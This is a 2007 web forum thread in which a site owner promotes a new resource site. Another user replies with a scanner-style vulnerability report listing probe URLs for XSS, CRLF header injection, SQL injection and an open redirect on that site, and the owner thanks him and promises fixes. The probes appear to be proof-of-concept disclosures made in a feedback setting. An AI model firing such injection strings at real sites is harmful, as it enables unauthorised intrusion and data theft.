carefree Posted July 4, 2007 Share Posted July 4, 2007 New resource site managed bt Westnblue pty ltd, are looking for 50 webmasters who have a product service or website they would like listed. Its easy - just add your product, service etc. and send us some feedback and tell us if everything went ok. Each webmaster will be awarded 60,000 credits (impressions) for thier contribution. Be honest with your feedback - we appreciate that. Start here : http://www.simple-scripts-online.com Regards Darryl weston Online manager Simple scripts online Link to comment Share on other sites More sharing options...
agentsteal Posted July 4, 2007 Share Posted July 4, 2007 Array: http://www.simple-scripts-online.com/signinform.php?msg[] Carriage Return Line Feed Injection: http://www.simple-scripts-online.com/insert_rating.php?sid=%0d%0aSet-Cookie%3A%20PHPSESSID%3Dvulnerable Carriage Return Line Feed Injection: http://www.simple-scripts-online.com/insertemails.php?sid=%0d%0aSet-Cookie%3A%20PHPSESSID%3Dvulnerable Cross Site Scripting: http://www.simple-scripts-online.com/signinform.php?msg=><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.simple-scripts-online.com/software-description.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.simple-scripts-online.com/tools/search/search.php?query="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if your username contains code. Full Path Disclosure: There is Full Path Disclosure on multiple pages in http://www.simple-scripts-online.com/tools/. Includes Directory: http://www.simple-scripts-online.com/_private/ Includes Directory: http://www.simple-scripts-online.com/_vti_pvt/ Includes Directory: http://www.simple-scripts-online.com/banners/_vti_cnf/ Includes Directory: http://www.simple-scripts-online.com/htdocs/ Includes Directory: http://www.simple-scripts-online.com/images/_vti_cnf/ Includes Directory: http://www.simple-scripts-online.com/tools/ Includes Directory: http://www.simple-scripts-online.com/users/ SQL Injection: http://www.simple-scripts-online.com/showcategory.php?cid=28 AND 1=1 http://www.simple-scripts-online.com/showcategory.php?cid=28 AND 1=2 SQL Injection: There is SQL Injection on http://www.simple-scripts-online.com/advertise1.php. SQL Injection: There is SQL Injection on http://www.simple-scripts-online.com/showcategory.php. SQL Injection: There is SQL Injection on http://www.simple-scripts-online.com/signup.php. URL Inclusion: http://www.simple-scripts-online.com/clicks_inc.php?id=1&click=1&url=http://www.google.com/ Link to comment Share on other sites More sharing options...
carefree Posted July 5, 2007 Author Share Posted July 5, 2007 Great work agentsteal. Yes the site was built over an existing one, we are deleting old directories as we speak and fixing the xss loophole, it should be ready for re-testing in under 6 hours. Thanks Darryl Link to comment Share on other sites More sharing options...
carefree Posted July 5, 2007 Author Share Posted July 5, 2007 What tool are you using to detect vunerabilities? Link to comment Share on other sites More sharing options...
LiamProductions Posted July 6, 2007 Share Posted July 6, 2007 On your link to use page, you need to make a vertical banner to go down the side of pages... Link to comment Share on other sites More sharing options...
carefree Posted July 7, 2007 Author Share Posted July 7, 2007 On your link to use page, you need to make a vertical banner to go down the side of pages... Great idea! We are currently creating verticle and various sized banners and text links. They should be availiable within a week. Link to comment Share on other sites More sharing options...
Recommended Posts